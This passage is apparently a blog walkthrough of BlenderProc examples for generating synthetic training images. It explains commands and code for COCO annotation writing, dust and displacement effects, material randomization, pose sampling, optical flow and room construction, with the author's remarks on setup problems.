    raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 用于确定输出的 COCO 格式注释文件的路径,并在需要追加输出时计算图像编号的偏移量
    coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
    # Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
    if append_to_existing_output and os.path.exists(coco_annotations_path):
    # 如果 append_to_existing_output 为 True,且文件系统中存在名为 'coco_annotations.json' 的文件,则将其加载到内存中
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
    existing_coco_annotations = json.load(fp)
    # 获取已存在图像 ID 的最大值,并加 1 作为图像编号的偏移量。这可以确保新生成的注释不会与已有的注释文件重复。
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
    else:
    # 如果 append_to_existing_output 参数为 False 或没有找到现有的注释文件,则图像编号的偏移量为 0,并且 existing_coco_annotations 变量设置为 None
    image_offset = 0
    existing_coco_annotations = None

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    # collect all RGB paths
    new_coco_image_paths = []
    # collect all mappings from csv (backwards compat)
    segcolormaps = []
    # collect all instance segmaps (backwards compat)
    inst_segmaps = []

    # for each rendered frame, from bpy.context.scene.frame_start to bpy.context.scene.frame_end
    for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

        if not instance_attribute_maps:
            # read the color mappings, which include the object name/class to integer mapping
            segcolormap = []
            with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
                reader = csv.DictReader(csvfile)
                for mapping in reader:
                    segcolormap.append(mapping)
            segcolormaps.append(segcolormap)

        if not instance_segmaps:
            # Load segmaps (backwards compat) and extract the instance channel (channel_instance)
            segmap = np.load(segmentation_map_output["path"] % frame)
            inst_channel = int(segcolormap[0]['channel_instance'])
            inst_segmaps.append(segmap[:, :, inst_channel])

        if colors:
            # If the colors list is non-empty, write the RGB (color) rendering via OpenCV's imwrite()
            # to the target path built from file_prefix and the image offset
            color_rgb = colors[frame - bpy.context.scene.frame_start]

            # Reverse channel order for opencv
            color_bgr = color_rgb.copy()
            color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

            if color_file_format == 'PNG':
                target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
                target_path = os.path.join(output_dir, target_base_path)
                cv2.imwrite(target_path, color_bgr)
            elif color_file_format == 'JPEG':
                target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
                target_path = os.path.join(output_dir, target_base_path)
                cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
            else:
                raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

        else:
            # Without a specific color scheme, simply copy the rendered RGB image to the target path
            source_path = rgb_output["path"] % frame
            target_base_path = os.path.join('images',
                                            file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
            target_path = os.path.join(output_dir, target_base_path)
            shutil.copyfile(source_path, target_path)

        # Remember the relative target path; this list is later used in the COCO annotations
        new_coco_image_paths.append(target_base_path)

    instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
    instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

    coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
                                                               instance_attribute_maps,
                                                               new_coco_image_paths,
                                                               supercategory,
                                                               mask_encoding_format,
                                                               existing_coco_annotations,
                                                               label_mapping)

    print("Writing coco annotations to " + coco_annotations_path)
    with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
        json.dump(coco_output, fp, indent=indent)

This code hands the collected instance segmentation maps, attribute mappings, image paths and the remaining parameters to _CocoWriterUtility.generate_coco_annotations(), which produces the COCO-format annotations. If old COCO annotations exist (existing_coco_annotations), they are merged into the generated ones.

Finally, the annotations are written to the given coco_annotations_path, and the path of the written file is printed to the console.
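For context, the public API that triggers this whole code path looks roughly as follows in a user script. This is a minimal sketch based on the coco_annotations example; the output path is illustrative and keyword names may differ between BlenderProc versions:

import os
import blenderproc as bproc

# segmentation passes must be rendered before the writer can build annotations
bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])
data = bproc.renderer.render()

# write the RGB images plus COCO annotations into output/coco_data
bproc.writer.write_coco_annotations(os.path.join("output", "coco_data"),
                                    instance_segmaps=data["instance_segmaps"],
                                    instance_attribute_maps=data["instance_attribute_maps"],
                                    colors=data["colors"],
                                    color_file_format="JPEG")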

    Diffuse color image

    Usage

    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5


    Code

    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()
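After rendering, the diffuse pass ends up in the returned data dict next to the other enabled outputs. A minimal sketch (assuming the pass is stored under a "diffuse" key):

data = bproc.renderer.render()
# data is expected to contain the "diffuse" images alongside the other enabled passes
bproc.writer.write_hdf5(args.output_dir, data)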

    How to apply dust to objects

    Usage

    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
    • resources/haven/models/ArmChair_01/ArmChair_01.blend: path to the blend file from the haven dataset; browse the models folder for all possible options.
    • resources/haven: the folder in which the hdri folder can be found, used to load a world environment.
    • examples/datasets/haven/output: path to the output directory.

This thing keeps tripping me up, damn it.

Download some Models and HDRIs from Little Paris Eiffel Tower HDRI • Poly Haven:


All the assets on this site are open source and free. Not bad!


Set up the paths and off we go!

    blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

And then it dies. I don't understand why glob.glob returns an empty list here; after rewriting that bit of code, this stinky mess finally runs.


    Visualization

    blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5


    Code

    # load the objects into the scene
    obj = bproc.loader.load_blend(args.model)[0]

    haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
    bproc.world.set_world_background_hdr_img(haven_hdri_path)
    1. bproc.loader.load_blend(args.model) loads the Blender model file given by args.model. The function returns a list of objects; we store the first one in the variable obj.
    2. bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path) picks a random HDR image path from the given directory: it scans args.hdri_path for .hdr files and randomly returns one of them.
    3. Finally, bproc.world.set_world_background_hdr_img(haven_hdri_path) sets the chosen HDR image path as the background of the Blender world, so that the 3D model and the selected HDR image combine into a realistic scene.

# Add dust to all materials of the loaded object
for material in obj.get_materials():
    bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

This code adds a dust effect to all materials of the model object loaded into Blender.

Concretely, it performs the following steps:

1. obj.get_materials() retrieves all materials of obj, and a for loop iterates over each of them.

2. Inside the loop, bproc.material.add_dust(material, strength=0.8, texture_scale=0.05) adds dust to the current material. The function takes three arguments:

  • material: the material to add dust to.
  • strength: the strength of the dust, 0.5 by default.
  • texture_scale: the scale of the dust texture, 0.01 by default.

  Based on these parameters, the dust texture is applied to the material, making it look more realistic.

So this code makes it easy to add a dust effect to model objects that are already loaded into Blender.
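To get more variety across materials, one could sample the dust strength instead of fixing it at 0.8. A minimal sketch continuing the example (the random range is my own choice, not from the example):

import random

# Hypothetical variation: draw a different dust strength for every material
for material in obj.get_materials():
    bproc.material.add_dust(material,
                            strength=random.uniform(0.2, 1.0),
                            texture_scale=0.05)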

    Object selection and manipulation using displacement modifier

This example demonstrates how to manipulate entities by adding displacement modifiers with different textures, as part of the EntityManipulator module.

    Usage

    blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

    Visualization

    blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5


    Code

# Add displacement to all objects
for obj in objs:
    # Create a uv mapping based on a cylinder projection
    obj.add_uv_mapping("cylinder")

    # Create a random procedural texture
    texture = bproc.material.create_procedural_texture('CLOUDS')
    # Displace the vertices of the object based on that random texture
    obj.add_displace_modifier(
        texture=texture,
        strength=random.gauss(0, 0.5),
        subdiv_level=random.randint(1, 3),
    )

If an object has no UV mapping, we add one, since it is necessary to map the displacement texture onto the object. For the UV mapping we use a projection; the projection types offered by Blender are "cube", "cylinder", "smart" and "sphere".

Then a displacement modifier with a random texture is added to each entity.

• strength is the amount of geometric displacement. Here we sample strength from a Gaussian distribution with mean 0.0 and standard deviation 0.5.
• If subdivision is applied, subdiv_level defines the number of subdivisions to perform on the entity. In this example we use between one and three subdivisions.
• mid_level is the texture value the modifier treats as "no displacement". Texture values below this threshold produce negative displacement along the selected direction, while values above it produce positive displacement: displacement = texture_value - mid_level. Keep in mind that color/luminosity values in Blender usually lie in (0.0 to 1.0), not (0 to 255).
• By giving a value for min_vertices_for_subdiv we can check whether an entity needs a subdivision modifier: if the entity has fewer vertices than min_vertices_for_subdiv, a Subdivision modifier is added to increase the vertex count. The vertex count strongly affects the displacement modifier; with too few vertices the displacement looks poor. A sketch with these extra parameters follows below.
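Putting the parameters from this list together, a call might look like this. This is a sketch assuming add_displace_modifier accepts mid_level and min_vertices_for_subdiv keywords as described above:

obj.add_displace_modifier(
    texture=texture,
    mid_level=0.5,                  # texture value treated as "no displacement"
    strength=random.gauss(0, 0.5),
    subdiv_level=random.randint(1, 3),
    min_vertices_for_subdiv=10000   # subdivide first if the mesh has fewer vertices
)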

    Camera lens distortion generation and validation

This program generates a typical BlenderProc virtual scene as well as distorted images (RGB, depth and normals) of a precisely measured camera calibration plate with known pose and intrinsics. The latter are used to validate the geometric camera model by comparing the generated images against real ones.

Emmm, I probably won't need this one.

    Usage

    Standard Scene:

    blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output


    simple calibration image by loading intrinsics and extrinsics from a file:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output


    fairly distorted image:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output


    • Load the objects and position them at the origin of the world reference frame.
    • Create a point light.
    • Set the camera intrinsics, including the lens distortion parameters.
    • Initialize the undistorted-to-distorted coordinate mapping for all generated undistorted images (usually at a higher resolution than required), which are eventually warped.
    • Sample camera-to-object poses, or, for the first example, load camera poses measured with camera calibration software (e.g., DLR CalLab v1).
    • Render the RGB, depth and normal images.
    • Apply the lens distortion (to the temporary, high-resolution intermediate Blender images) and then crop them to the desired resolution.
    • Write the distorted data into an .hdf5 container.
    • Test by comparing the generated images against the reference real images ./images/lens_img1_real.jpg and ./images/lens_img2_real.png.

    Material Randomization

    Usage

    blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
    • examples/advanced/material_randomizer/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/material_randomizer/output: path to the output directory.

Visualization

Results of several runs; the materials generally differ:


    Code

# Collect all materials
materials = bproc.material.collect_all()

# Go through all objects
for obj in objs:
    # For each material of the object
    for i in range(len(obj.get_materials())):
        # In 50% of all cases
        if np.random.uniform(0, 1) <= 0.5:
            # Replace the material with a random one
            obj.set_material(i, random.choice(materials))

This code operates on all objects loaded into Blender and randomly replaces their materials.

Concretely, it performs the following steps:

1. bproc.material.collect_all() first collects all materials, then for obj in objs: iterates over every object loaded in the Blender scene.
2. For each material of the current object, for i in range(len(obj.get_materials())): iterates over the material slots.
3. In every iteration, np.random.uniform(0, 1) draws a random number between 0 and 1; if it is at most 0.5, i.e. with 50% probability, the following step is executed.
4. obj.set_material(i, random.choice(materials)) replaces the current material with one randomly chosen from the materials list collected above.

So this code lets you easily randomize the materials of all loaded objects with a given probability, giving the renderer richer and more varied output.
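The same idea can be restricted to a subset of objects, for instance via a name filter. A sketch continuing the example above (the "Cube.*" pattern is my own illustration; objs, materials, np and random are assumed to be defined as before):

# Hypothetical variation: only randomize the materials of objects named "Cube..."
cubes = bproc.filter.by_attr(objs, "name", "Cube.*", regex=True)
for obj in cubes:
    for i in range(len(obj.get_materials())):
        if np.random.uniform(0, 1) <= 0.5:
            obj.set_material(i, random.choice(materials))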

    Motion Blur and Rolling Shutter

In this example we show how to generate motion blur and rolling shutter effects.

These effects become visible when the camera or objects move between frames. Here, with the objects static, the camera goes through the following motion:

    0 -10 4 1.3 0 0 # initial position
    0 -15 4 1.3 0 0 # moving away from object
    5 -15 4 1.3 0 0 # moving to the right
    5 -15 8 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

It won't run. Ugh.

    Object pose sampling

This example focuses on object.ObjectPoseSampler, which allows pose sampling of objects inside a sampling volume with collision checks.

    Usage

    blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
    • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/object_pose_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5


    Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

# Sample the poses of all objects, while making sure that no objects collide with each other.
bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs
)

We define a function that samples and sets the location and rotation of an object. The object is placed at the sampled pose, and collision checks are performed against all objects specified via objects_to_check_collisions (all objects by default). On collision, the position is reset and a new pose is sampled. The maximum number of attempts can be defined via max_tries; see the sketch below.
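With max_tries made explicit, the call from above might look like this (a sketch; 1000 is simply an illustrative value):

bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs,
    max_tries=1000  # give up on an object after this many resampling attempts
)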

On surface object pose sampling

This example focuses on the OnSurfaceSampler, which allows pose sampling of selected objects on a chosen surface.

    Usage

    blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
    • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/on_surface_object_sampling/scene.blend: path to the object file with the basic scene.
    • examples/advanced/on_surface_object_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5


    Code

# Define a function that samples the pose of a given object
def sample_pose(obj: bproc.types.MeshObject):
    # Sample the spheres location above the surface
    obj.set_location(bproc.sampler.upper_region(
        objects_to_sample_on=[surface],
        min_height=1,
        max_height=4,
        use_ray_trace_check=False
    ))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

This code defines a function sample_pose and uses it to sample poses for model objects loaded into Blender.

Concretely, it performs the following steps:

1. It defines a function sample_pose whose input is a bproc.types.MeshObject obj, the model object whose pose should be sampled. Inside the function:
  • bproc.sampler.upper_region() samples a location for the current object, which obj.set_location() assigns as the object's position. The parameters used here are:
    • objects_to_sample_on: a List[bproc.types.Object] of reference objects to sample on; here we pass the surface object.
    • min_height and max_height: the minimum and maximum height of the sampled location. With 1 and 4, the location lies between 1 and 4 units above the surface object.
    • use_ray_trace_check: a boolean indicating whether a ray-trace check should be used to avoid locations that intersect other objects; here it is set to False, i.e. no ray-trace check.
  • np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]) draws a random Euler-angle vector, which obj.set_rotation_euler() assigns as the object's rotation.
2. Once defined, the function can be used to sample locations and orientations for loaded model objects, adding variety and realism to the renders, especially when an object should be placed above a surface.

So this code provides a simple way to sample object poses, and it can be extended into more complex sampling logic for richer and more realistic scene renders.

    # Sample the spheres on the surface
    spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

Set up the rigid bodies:

# Enable physics for spheres (active) and the surface (passive)
for sphere in spheres:
    sphere.enable_rigidbody(True)
surface.enable_rigidbody(False)

Run the physics simulation:

    # Run the physics simulation
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

    Optical Flow

In this example we demonstrate how to obtain forward/backward optical flow values between consecutive key frames.

The flow becomes visible when the camera or objects move between frames. Here, the camera goes through the following motion:

    0 -10 4 1.3 0 0  # initial position
    0 -12 4 1.3 0 0 # moving away from object
    2 -12 4 1.3 0 0 # moving to the right
    2 -12 6 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
    • examples/advanced/optical_flow/main.py: path to the main python file to run.
    • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/optical_flow/output: path to the output directory.

Visualization

    blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5


    Code

    # Render the optical flow (forward and backward) for all frames
    data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
    • Iterate over all camera poses and render forward and/or backward optical flow.
    • The images are rendered in .exr format, which allows a linear color space and higher precision, and are then converted into numpy.float32 arrays.
    • By default, Blender uses the bottom-left corner as the coordinate origin, while OpenCV and popular flow datasets use the top-left corner. To get the default Blender behavior, set the flag "blender_image_coordinate_style": True. Note that the colors in the visualization will then differ!
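To inspect the rendered flow afterwards, the hdf5 container can be opened directly. A minimal sketch, assuming the passes are stored under "forward_flow" and "backward_flow" keys:

import h5py
import numpy as np

with h5py.File("examples/advanced/optical_flow/output/1.hdf5", "r") as f:
    forward_flow = np.array(f["forward_flow"])   # per-pixel (dx, dy) displacements
    print(forward_flow.shape, forward_flow.dtype)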

    Convex decomposition for generating stable and exact collision shapes

When running physics simulations in Blender, choosing the right collision shape is crucial for stable results. The CONVEX_HULL collision shape gives very stable simulations, but for non-convex objects the results can look very unrealistic (e.g., floating objects). The MESH collision shape allows more precise collisions, but the simulation becomes very unstable and objects may penetrate each other.

CONVEX_DECOMPOSITION is the compromise between the two: the V-HACD algorithm decomposes a given non-convex object into multiple approximately convex parts. The union of these parts can be used as a precise and stable collision shape for the object.

In this example we load a bin and some highly non-convex ShapeNet objects, apply convex decomposition to generate collision shapes, and let the objects drop into the bin.

The dataset is hard to download and I probably won't need it. Give up!

    Random Backgrounds


In this example we generate renderings of an object (Suzanne) and paste them onto random background images, randomizing the object's position, orientation, material properties and lighting. This is a simple way to generate training data for classification, object detection and segmentation tasks. It is easy to implement and use, but usually yields worse results than rendering objects inside an actual 3D scene.

    Usage

    blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
    • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
    • examples/advanced/random_backgrounds/object.ply: path to the object file.
    • examples/advanced/random_backgrounds/output: path to the output directory.

Emmm, so it renders an image without a background and then swaps in a different one.

Then run:

    python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

to paste in the backgrounds.

    Code

    # Enable transparency so the background becomes transparent
    bproc.renderer.set_output_format(enable_transparency=True)

This code enables the transparent-background feature of the Blender renderer, so that the background in the rendered output becomes transparent.

Concretely, it does the following:

1. It calls set_output_format() from the bproc.renderer module, which configures the render output format; passing enable_transparency=True enables the transparent background.
2. With transparency enabled, the background is rendered as transparent, which allows seamless compositing and overlaying in other software.

So this line quickly enables the transparent background of the Blender renderer, which is convenient for subsequent image processing and compositing.
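The paste step itself is conceptually simple. Below is a rough, hypothetical re-implementation of what paste_images_on_backgrounds.py does, not the script's actual code:

from pathlib import Path
import random
from PIL import Image

def paste_on_background(render_path: str, background_dir: str, out_path: str) -> None:
    # rendered image with transparent background
    render = Image.open(render_path).convert("RGBA")
    # pick a random background and match the render size
    backgrounds = list(Path(background_dir).glob("*.jpg"))
    background = Image.open(random.choice(backgrounds)).convert("RGBA").resize(render.size)
    # composite the object over the background and save as RGB
    background.alpha_composite(render)
    background.convert("RGB").save(out_path)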

    Random Room Constructor

This example explains the RandomRoomConstructor. The module builds a random room and places objects loaded by other modules inside it.

The example uses the CCMaterialLoader, so the cc_textures have to be downloaded; a script is provided for that. It also uses the IkeaLoader; see the Ikea example.

Both are required to run this example.

Again hard to download. Give up!

    Code

# Load materials and objects that can be placed into the room
materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
interior_objects = []
for i in range(15):
    interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

The cctextures were downloaded via the script; here only assets whose name contains one of the listed names are used. This makes the result more realistic, since things like "Asphalt" are usually not found indoors. In addition, 15 objects are loaded from the specified Ikea dataset categories.

# Construct random room and fill with interior_objects
objects = bproc.constructor.construct_random_room(used_floor_area=25,
                                                  interior_objects=interior_objects,
                                                  materials=materials, amount_of_extrusions=5)

construct_random_room builds a random floor plane and the corresponding walls and ceiling. It places the loaded Ikea objects at random locations and assigns cc-texture materials. The room has a floor area of 25 square meters and at most 5 extrusions. An extrusion is a corridor-like part that sticks out of the base rectangle in the middle; extrusions can be wider or narrower, but never smaller than the minimal corridor_width. The module automatically distributes the 25 square meters over all extrusions.

    # Bring light into the room
    bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

This makes the ceiling emit light and removes any material placed on it.

BlenderProc Examples overview - Basic Examples

Resources

Repository: DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com). Download it locally and open it with Python, using the previously created blender environment as the interpreter.

Main content

    Basic example

    Usage

The example code is in examples/basics/basic/main.py. In the shell, enter:

    blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

and off it goes! Well, hold on, it throws an error:

    It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
    Gonna try to download it automatically.
    Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: The read operation timed out.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: <urlopen error timed out>.

I set a global proxy with TUN mode and after a few more runs it worked, orz


So apparently downloading freeimage-3.15.1-win64.dll from the web and putting it under C:\Users\XXXX\AppData\Local\imageio\freeimage\ works too!

    File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
    Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
    Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
    Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
    Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
    Selecting render devices...
    Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Timer 'OBJ_import' took 1.5ms
    Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
    Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

    ...

    Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
    Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
    Time: 00:01.36 (Saving: 00:00.30)

    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

    ...

    Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
    Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
    Time: 00:00.86 (Saving: 00:00.01)

    Merging data for frame 0 into examples/basics/basic/output\0.hdf5
    Merging data for frame 1 into examples/basics/basic/output\1.hdf5

    Blender quit
    Cleaning temporary directory

    Visualization

    blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

Three images are rendered: colors, depth and normals:


    Code

The script takes three parser arguments:

    • examples/resources/camera_positions: a text file with the camera parameters.


The first line says the camera is located at (0, -13.741, 4.1242), rotated by 1.3 around the x axis, 0 around the y axis and 0 around the z axis.

The second line says the camera is located at (1.9488, -6.5202, 0.23291), rotated by 1.84 around the x axis, 0 around the y axis and 0.5 around the z axis.

    • examples/resources/scene.obj: an obj file with the information of the basic scene.


This is a Wavefront OBJ file, a 3D object file format. It contains several objects, such as "Cube" and "Cube.001".

At the beginning of the file, the line "mtllib scene.mtl" states that the file references a material library file named "scene.mtl", which defines the materials/textures used by these objects.

Next, the "v", "vt" and "vn" keywords define the vertex positions, texture coordinates and normals of each object.

Concretely, the three numbers after each "v" are the x, y and z coordinates of a vertex;

the two numbers after each "vt" are a texture coordinate, here a position relative to the material image;

the three numbers after each "vn" are the x, y and z components of a normal vector.

The "f" lines below describe polygons; the numbers after each "f" are the components of that polygon.

Within these lines, the numbers are separated by slashes "/".

Concretely, each group denotes one vertex of the polygon: the first index refers to the corresponding "v" line with the vertex position, while the following indices refer to the "vt" and "vn" lines.

The last index of each group gives the normal of the polygon, taken from the "vn" lines, which specifies the orientation of the plane the polygon lies in.

"s off" disables smooth shading.
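To make the v/vt/vn/f layout concrete, here is a tiny illustrative parser for the vertex and face lines described above (a sketch only; it ignores the vt/vn data):

vertices, faces = [], []
with open("examples/resources/scene.obj") as f:
    for line in f:
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "v":
            # vertex position: x y z
            vertices.append(tuple(map(float, parts[1:4])))
        elif parts[0] == "f":
            # face: v/vt/vn index groups, 1-based; keep only the position index
            faces.append([int(p.split("/")[0]) - 1 for p in parts[1:]])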

    • examples/basics/basic/output: path to the output directory.
    import blenderproc as bproc
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
    parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
    parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
    args = parser.parse_args()

Initialize blenderproc:

    bproc.init()

Load the model scene from args.scene:

    objs = bproc.loader.load_obj(args.scene)

Add a light:

    # define a light and set its location and energy level
    light = bproc.types.Light()
    light.set_type("POINT")
    light.set_location([5, -5, 5])
    light.set_energy(1000)

Set up the camera: this code sets the camera resolution, reads the camera positions and converts them into homogeneous camera-to-world transformation matrices.

# define the camera resolution
# bproc.camera.set_resolution() takes the width and the height of the camera image; here 512x512
bproc.camera.set_resolution(512, 512)

# read the camera positions file and convert into homogeneous camera-world transformation
with open(args.camera, "r") as f:
    for line in f.readlines():
        # read the file line by line, turn each position into a homogeneous transformation
        # matrix and register it via bproc.camera.add_camera_pose()
        line = [float(x) for x in line.split()]
        position, euler_rotation = line[:3], line[3:6]
        matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
        bproc.camera.add_camera_pose(matrix_world)

Render the images:

    # activate normal and depth rendering
    bproc.renderer.enable_normals_output()
    bproc.renderer.enable_depth_output(activate_antialiasing=False)
